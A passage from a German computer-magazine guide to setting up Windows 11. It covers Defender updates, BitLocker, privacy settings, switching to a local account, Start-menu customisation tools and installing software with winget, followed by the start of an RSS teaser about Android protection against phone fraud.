<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704c5e3"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/malware-schutz.png" alt="Malware-Schutz in Windows optimieren" class="wp-image-2279525" width="1024" height="937" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<h2 class="wp-block-heading toc">Schutzupdates für den Malware-Scanner</h2>



<p>Wichtig ist zudem, dass Sie bei “Updates für Viren- und Bedrohungsschutz” sicherstellen, dass die Sicherheitsinformationen vom aktuellen Tag sind. Mit “Schutzupdates” und dann “Nach Updates suchen” aktualisieren Sie diese direkt.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704cd98"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/schutzupdates.png" alt="Schutzupdates in Windows" class="wp-image-2279526" width="883" height="549" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Nutzen Sie einen externen Virenschutz, sind diese Anpassungen nicht notwendig, da dieser den internen Virenschutz in Windows deaktiviert. </p>



<h2 class="wp-block-heading toc">Windows-Aktivierung prüfen</h2>



<p>In den Einstellungen finden Sie über “System → Aktivierung” die Option, ob Windows aktiviert ist. Ohne Aktivierung stellt das Betriebssystem nach einiger Zeit den Betrieb ein und viele Einstellungen sind nicht verfügbar. Hier sehen Sie, ob die Aktivierung funktioniert und können bei Bedarf über “Ändern” Ihren Produktschlüssel für Windows 10 oder Windows 11 neu eintragen.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704d5e8"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/aktivierung.png" alt="Windows-Aktivierung" class="wp-image-2279527" width="899" height="667" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Sie erreichen diesen Bereich auch durch Eingabe von “slui” im Suchfeld der Taskleiste.</p>



<h2 class="wp-block-heading toc">Sind alle Treiber installiert?</h2>



<p>Über den Befehl “devmgmt.msc”, den Sie im Suchfeld der Taskleiste eingeben, sehen Sie, ob für alle vorhandenen Geräte im PC auch alle Treiber installiert sind. Wenn hier noch unbekannte oder andere Geräte angezeigt werden, sollten Sie sich beim Hersteller den aktuellen Treiber besorgen und diesen installieren.</p>



<h2 class="wp-block-heading toc">Laufwerksverschlüsselung aktivieren</h2>



<p>Vor allem auf Notebooks sollten Sie darauf achten, dass Sie Bitlocker zur Laufwerksverschlüsselung verwenden. Geben Sie dazu “bitlocker” im Suchfeld der Taskleiste ein und aktivieren Sie den Schutz.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704de1a"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/03/bitlocker.png" alt="Bitlocker schützt Windows" class="wp-image-2279528" width="920" height="583" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Thomas Joos</p></div>



<p>Bitlocker steht in Windows 11 Pro und Enterprise zur Verfügung. In Windows 11 Home können Sie stattdessen die Geräteverschlüsselung verwenden. Diese ist in den Einstellungen von Windows 11 zu finden.</p>



<h2 class="wp-block-heading toc">Datenschutz überprüfen</h2>



<p>Wer nach der Installation Bedenken über die getroffenen <strong>Datenschutzeinstellungen </strong>hat, sollte diese prüfen und bei Bedarf ändern.</p>



<p>Dazu rufen Sie die „Einstellungen“- App auf, was am schnellsten mit der Tastenkombination Win-I geht. Die wichtigsten Optionen finden Sie unter „Datenschutz und Sicherheit“. </p>



<p>Es empfiehlt sich, <strong>alle Optionen einmal durchzugehen</strong> und das nach einem Funktionsupgrade zu wiederholen. Teilweise werden Optionen bei einem Upgrade neu gesetzt, außerdem erfolgt nach manchen Funktionsupgrades eine Abfrage der Basiseinstellungen wie bei der Neuinstallation.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704e481"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_1.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Auf die Finger geschaut: Welche Daten Ihr PC an Microsoft sendet, lässt sich herausfinden. Bedenkliches sollte nicht dabei sein, aber die Übermittlung ist vielleicht trotzdem unerwünscht." class="wp-image-2934451" width="1200" height="713" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Auf die Finger geschaut: Welche Daten Ihr PC an Microsoft sendet, lässt sich herausfinden. Bedenkliches sollte nicht dabei sein, aber die Übermittlung ist vielleicht trotzdem unerwünscht.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Im Vergleich zu Windows 10 sind die Optionen in mehr Rubriken unterteilt und wirken dadurch unübersichtlicher. Sie finden aber die Rubriken wieder, die Sie schon von der Neuinstallation kennen, etwa „Mein Gerät suchen“, „Freihand- und Eingabeanpassung“ sowie „Diagnose und Feedback“.</p>



<p>Letztere bietet die Funktion „Diagnosedaten anzeigen“ für alle, die es genauer wissen wollen. Ist die Option aktiviert, führt ein Klick auf „Diagnosedatenanzeige öffnen“ erst einmal in den Microsoft Store, über den Sie die App Diagnosedatenanzeige installieren müssen. Die zeigt Ihnen dann die gesammelten Daten an. Die Liste ist umfangreich und nicht einfach zu analysieren. </p>



<p>Man kann aber zumindest ermitteln, ob persönliche Daten enthalten sind oder nicht.</p>



<p><strong>App-Berechtigungen: </strong>Herkömmliche Desktop-Anwendungen haben Zugriff auf alle Ordner und Geräte, auf die auch der Nutzer Zugriff hat. Wenn ein Programm administrative Rechte anfordert, ist fast alles möglich. </p>



<p>Bei Apps aus dem Microsoft Store informiert Sie die Download-Seite über die erforderlichen Berechtigungen. Hier sollte man skeptisch werden, etwa wenn eine App die Kamera nutzen möchte, obwohl das für deren Aufgabe nicht nötig ist.</p>



<p>Die Zugriffsrechte lassen sich auch nach der Installation prüfen und genau einstellen. Dazu gehen Sie in den „Einstellungen“ auf „Datenschutz &amp; Sicherheit“ und wählen weiter unten unter „App-Berechtigungen“ eine Rubrik wie „Kamera“, „Kontakte“ oder „Bilder“. </p>



<p>Im jeweiligen Abschnitt sehen Sie, welcher App die Nutzung beziehungsweise der Zugriff erlaubt ist. Bei den Standard-Apps von Microsoft besteht kein Handlungsbedarf. Sind weitere Apps installiert, sollten Sie prüfen, ob unnötige Berechtigungen vergeben sind.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<h2 class="wp-block-heading">Datenschutzeinstellungen mit einem Tool anpassen</h2>



<p>Das Tool <a href="https://www.oo-software.com/de/shutup10" target="_blank" rel="noreferrer noopener">O&amp;O Shutup</a> bietet einen einfacheren Zugang zu den Datenschutzeinstellungen. Nach dem Start gehen Sie zuerst auf „Datei –› Einstellungen exportieren“ und speichern die aktuellen Einstellungen. Danach legen Sie zur Sicherheit über „Aktionen –› Systemwiederherstellungspunkt erzeugen“ ein Backup an.</p>



<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704ec5c"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_2.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Schnelleinstellungen: O&amp;O Shutup listet alle für den Datenschutz relevanten Einstellungen auf. Deaktivieren Sie unnötige Optionen, was im Tool mit einem Klick geschehen kann." class="wp-image-2934461" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Schnelleinstellungen: O&amp;O Shutup listet alle für den Datenschutz relevanten Einstellungen auf. Deaktivieren Sie unnötige Optionen, was im Tool mit einem Klick geschehen kann.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>O&amp;O Shutup zeigt zwei Registerkarten, über die Sie zwischen den Einstellungen „Aktueller Benutzer“ und „Gesamter Rechner“ umschalten können. Per Klick auf „Aktionen –› Nur empfohlene Einstellungen anwenden“ passen Sie alle Optionen auf der gewählten Registerkarte für optimalen Datenschutz an. </p>



<p>Wer sich mehr Informationen wünscht, klickt die einzelnen Einstellungen an, wodurch das Tool einen kurzen Hilfetext anzeigt. Vorsicht ist bei den Optionen mit dem Zusatz „bedingt“ geboten. Der Hilfetext weist auf mögliche Nebenwirkungen hin. Steht in der Spalte „Empfohlen“ der Hinweis „Nein“, ändern Sie die Einstellung besser nicht.</p>
</div>



<h2 class="wp-block-heading toc">Windows auf ein lokales Konto umstellen</h2>



<p>Windows 11 erfordert bei der Neuinstallation zwingend die Anmeldung mit einem Microsoft-Konto. Wer es benötigt, etwa für Onedrive, Cloudfunktionen oder bestimmte Apps, sollte es dabei belassen. </p>



<p>Wenn nicht, können Sie für mehr Datenschutz auch auf ein lokales Konto umsteigen. Dazu gehen Sie in den „Einstellungen“ auf „Konten –› Ihre Infos“ und klicken unter „Kontoeinstellungen“ auf „Stattdessen mit einem lokalen Konto anmelden“. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5704f4af"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_3.jpg?quality=50&amp;strip=all" alt="Weniger Microsoft: Wenn Sie ein Microsoft- Konto nicht zwingend benötigen, können Sie nach der Windows- Installation problemlos auf ein lokales Konto umsteigen." class="wp-image-2934463" width="800" height="436" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Weniger Microsoft: Wenn Sie ein Microsoft- Konto nicht zwingend benötigen, können Sie nach der Windows- Installation problemlos auf ein lokales Konto umsteigen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Klicken Sie auf „Weiter“ und bestätigen Sie mit Ihrem Kennwort. Danach legen Sie Benutzernamen, Passwort und einen Kennworthinweis fest, klicken auf „Weiter“ und dann auf „Abmelden und fertig stellen“.</p>



<p>Gelegentlich zeigt Windows eine Meldung an, die Sie zum Umstieg auf ein Microsoft-Konto bewegen soll. Um das zu verhindern, gehen Sie in den „Einstellungen“ auf „System –› Benachrichtigungen und Aktionen“ und entfernen das Häkchen vor „Möglichkeit zum Abschließen der Einrichtung meines Geräts für die optimale Nutzung von Windows vorschlagen“.</p>



<h2 class="wp-block-heading toc">Startmenü anpassen</h2>



<p>Das Startmenü ist eine <strong>Windows-Dauerbaustelle</strong>. Mit dem von Windows 7 waren die meisten Nutzer zufrieden, die Kacheln in Windows 8 haben wahrscheinlich kaum jemandem gefallen, und das von Windows 10 traf auch nicht die ungeteilte Begeisterung. </p>



<p>Seit der ersten Veröffentlichung von Windows 11 hat Microsoft das Startmenü mehrfach überarbeitet. Der grundsätzliche Aufbau ist jedoch gleich geblieben. </p>



<p>Das Menü öffnet sich standardmäßig in der Mitte des Bildschirms und zeigt ProgrammIcons unter „Angeheftet“. Darunter gibt es die Kategorie „Empfohlen“. Ein Klick auf die Schaltfläche „Alle“ führt zu einer alphabetischen Liste aller Apps und Programme.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e57050059"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_5.jpg?quality=50&amp;strip=all" alt="Startzentrale: Das Windows- 11-Startmenü erfüllt seine Aufgabe, aber kaum mehr. Immerhin hat Microsoft inzwischen ein paar Optionen für individuelle Anpassungen nachgeliefert." class="wp-image-2934471" width="800" height="773" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Startzentrale: Das Windows- 11-Startmenü erfüllt seine Aufgabe, aber kaum mehr. Immerhin hat Microsoft inzwischen ein paar Optionen für individuelle Anpassungen nachgeliefert.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Sie können die Icons per Drag &amp; Drop umsortieren und ein Icon auf ein anderes ziehen, um einen Ordner zu bilden. Dem Ordner kann man auch einen Namen geben. </p>



<p>Weitere Programme fügen Sie aus der Liste unter „Alle“ zum Startmenü hinzu, indem Sie im Kontextmenü „An ‚Start‘ anheften“ wählen. Befindet es sich bereits dort, wird ihnen „Von ‚Start‘ lösen“ angeboten.</p>



<p>Wenn Sie mit der rechten Maustaste auf einen freien Bereich im Startmenü klicken, erscheint die Schaltfläche „Starteinstellungen“, die in der „Einstellungen“-App zu „Personalisierung –› Start“ führt. Das Fenster bietet neben „Standard“ die Layouts „Mehr angeheftete Elemente“ und „Mehr Empfehlungen“. </p>



<p>Außerdem können Sie mit den Schaltern „Zuletzt hinzugefügte App anzeigen“ und „Meistverwendete Apps anzeigen“ bestimmen, was im Startmenü erscheinen soll. Nach einem Klick auf „Ordner“ aktivieren Sie beispielsweise „Einstellungen“, „Datei-Explorer“ oder „Downloads“. </p>



<p>Die zugehörigen Icons erscheinen im Startmenü links neben dem Netzschaltersymbol – praktisch für den schnellen Zugriff auf die ausgewählten Elemente.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e57050a53"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_6.jpg?quality=50&amp;strip=all" alt="Startmenü anpassen: Wenn Sie die App-Empfehlungen kaum verwenden, aber mehr Programme anheften wollen, können Sie das bei Windows 11 unter „Personalisierung –› Start“ festlegen." class="wp-image-2934475" width="973" height="598" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Startmenü anpassen: Wenn Sie die App-Empfehlungen kaum verwenden, aber mehr Programme anheften wollen, können Sie das bei Windows 11 unter „Personalisierung –› Start“ festlegen.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p><strong>Alternative Software für Startmenü und Taskleiste</strong></p>



<p>Wer das Design von Windows 7 vermisst, installiert das kostenlose <a href="https://github.com/Open-Shell/Open-Shell-Menu" target="_blank" rel="noreferrer noopener">Open Shell Menu</a>. Das Tool ersetzt das Startmenü von Windows 11 komplett und zeigt die von Windows 7 gewohnten Menüeinträge und Schaltflächen.</p>



<p>Nach der Installation erscheint nach einem Klick auf die Schaltfläche „Start“ ein Konfigurationsdialog. Hier legen Sie fest, wie das neue Startmenü aussehen soll. Das Original-Windows-Startmenü lässt sich weiterhin aufrufen. Dazu halten Sie die Shift-Taste gedrückt und klicken auf die Schaltfläche „Start“.</p>



<p><a href="https://stardock.pxf.io/c/230135/1292592/15833?u=https://www.stardock.com/products/start11/&amp;subid1=rss" target="_blank" rel="noreferrer noopener">Start 11</a> bietet nützliche Anpassungen für das Windows-Startmenü und die Taskleiste. Es sind zahlreiche Optionen verfügbar, beispielsweise abgerundete Ecken, veränderbare Transparenz und die Positionierung der Taskleiste am oberen Bildschirmrand. Windows 11 erlaubt nur die zentrierte oder linksbündige Ausrichtung am unteren Bildschirmrand. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a51e5705139f"}' data-wp-interactive="core/image" class="wp-block-image size-full wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/10/windows_11_anpassungen_7.jpg?quality=50&amp;strip=all" alt="Individuelles Startmenü: Start 11 ermöglicht zahlreiche Anpassungen für Startmenü und Taskleiste. Wer möchte, kann auch ein Menü im Stil von Windows 7 verwenden." class="wp-image-2934476" width="934" height="556" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p>Individuelles Startmenü: Start 11 ermöglicht zahlreiche Anpassungen für Startmenü und Taskleiste. Wer möchte, kann auch ein Menü im Stil von Windows 7 verwenden.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p><a href="https://www.startallback.com/" target="_blank" rel="noreferrer noopener">Start All Back</a> bietet ähnliche Funktionen wie Open Shell Menu, was das Startmenü betrifft. Es sind aber mehr Optionen für individuelle Anpassungen verfügbar. </p>



<p>Interessant ist das Tool für Nutzer, die die Taskleiste oben oder vertikal links oder rechts anordnen möchten. Beim Windows-Explorer erhalten Sie auf Wunsch die Ribbon-Leiste von Windows 10 zurück. Das klassische Kontextmenü kann Start All Back ebenfalls wiederherstellen.</p>



<p><a href="https://punklabs.com/rocketdock" target="_blank" rel="noreferrer noopener">Rocket Dock</a> ist kostenlos und als Programmstarter ein guter Ersatz für die in Windows 11 weggefallenen Symbolleisten in der Taskbar. Das Tool zeigt eine Leiste am oberen Bildschirmrand mit animierten Starter-Icons im Mac-OS-Stil, die zu Ordnern wie „Dokumente“ oder „Bilder“ führen. </p>



<p>Ziehen Sie Verknüpfungen zu Desktop-Programmen oder ausführbaren Dateien auf das Dock, um Starter hinzuzufügen. Wenn Sie Apps in das Dock aufnehmen möchten, drücken Sie die Tastenkombination Win-R, geben </p>



<pre class="wp-block-code"><code>shell:AppsFolder </code></pre>



<p>ein und klicken danach auf „OK“. Klicken Sie die gewünschte App an und wählen Sie im Kontextmenü „Verknüpfung erstellen“. Erteilen Sie mit „Ja“ die Erlaubnis für eine Verknüpfung auf dem Desktop. Ziehen Sie die Verknüpfung auf das Dock und klicken Sie im Kontextmenü auf „Symbol-Eigenschaften“. </p>



<p>In das Eingabefeld „Ziel“ setzen Sie shell:AppsFolder/ vor den Programmnamen und klicken auf „OK“.</p>



<div class="wp-block-idg-base-theme-box-text inline-box">
<h2 class="wp-block-heading toc">Winget: Software schnell installieren</h2>



<p>Bei einem frisch installierten Windows müssen Sie zuerst die Software einrichten, die Sie für gewöhnlich nutzen. Wenn Sie hauptsächlich Open-Source-Software oder andere Gratis-Programme einsetzen, bietet Windows 11 einen schnellen Weg zur Software-Grundausstattung.</p>



<p>Öffnen Sie das Windows-Terminal als Administrator und starten Sie die Befehlszeile</p>



<p><em>winget search 7-Zip</em></p>



<p>Beim ersten Aufruf müssen Sie die Nutzungsbedingungen von Microsoft akzeptieren. Das Tool gibt Ihnen als Suchergebnis die ID des Programms aus, bei unserem Beispiel „7zip.7zip“. Um beispielsweise Libre Office, 7-Zip, Adobe Acrobat DC und Notepad++ in einem Rutsch zu installieren, verwenden Sie die Zeile</p>



<p><em>winget install TheDocumentFoundation.LibreOffice 7zip.7zip XPDP273C0XHQH2 Notepad++.Notepad++</em></p>



<p>Sollte Ihnen die Benutzung im Terminal zu umständlich erscheinen, verwenden Sie Uniget UI, eine grafische Oberfläche für Winget.</p>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[So clever schützt Sie Android vor Telefonbetrug]]></title>
<description><![CDATA[wisely / Shutterstock.com



Ob der angebliche Bankmitarbeiter, der falsche Polizist oder der berüchtigte Enkeltrick: Telefonbetrug (Vishing) hat sich zu einer regelrechten Epidemie entwickelt. Kriminelle nutzen manipulierte Rufnummern (Spoofing; lesen Sie hierzu unseren Ratgeber Call-ID Spoofing...]]></description>
